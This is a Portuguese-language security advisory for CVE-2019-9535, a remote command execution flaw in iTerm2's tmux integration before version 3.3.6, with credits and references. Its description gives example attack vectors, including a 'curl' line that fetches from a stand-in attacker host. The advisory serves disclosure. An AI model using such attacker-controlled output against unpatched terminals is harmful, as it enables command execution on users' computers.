ASA-2019-00556 – iTerm2: Execução remota de comando através de output para o terminal


For the English version of this alert, click here.

Allele Security Alert

ASA-2019-00556

Identificador(es)

ASA-2019-00556, CVE-2019-9535

Título

Execução remota de comando através de output para o terminal

Fabricante(s)

George Nachman

Produto(s)

iTerm2

Versão(ões) afetada(s)

iTerm2 versões anteriores à 3.3.6

Versão(ões) corrigida(s)

iTerm2 versão 3.3.6

Prova de conceito

Sim

Descrição

Uma vulnerabilidade crítica foi identificada no recurso de integração tmux do iTerm2. Um atacante capaz de produzir output para o terminal pode, em muitos casos, executar comandos no computador do usuário. Exemplos de vetores de ataque para isso seriam a conexão com um servidor SSH controlado por um atacante ou comandos como curl http://attacker.com e tail -f /var/log/apache2/referer_log.

Detalhes técnicos

Desconhecido

Créditos

Stefan Grönke e Fabian Freyer (Radically Open Security)

Referência(s)

Important security update — please upgrade!
https://groups.google.com/forum/m/#!topic/iterm2-discuss/57k_AuLdQa4

Critical Security Issue identified in iTerm2 as part of Mozilla Open Source Audit
https://blog.mozilla.org/security/2019/10/09/iterm2-critical-issue-moss-audit/

Do not send server-controlled values in tmux integration mode.
https://github.com/gnachman/iTerm2/commit/538d570ea54614d3a2b5724f820953d717fbeb0c

CVE-2019-9535
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9535

CVE-2019-9535
https://nvd.nist.gov/vuln/detail/CVE-2019-9535

Se encontrou algum erro neste alerta ou deseja uma análise compreensiva, entre em contato.

Última modificação: 14 outubro 2019

Não somos responsáveis por qualquer perda de dados, corrupção de dispositivos ou qualquer outro tipo de problema devido ao uso de qualquer informação mencionada em nossos alertas de segurança.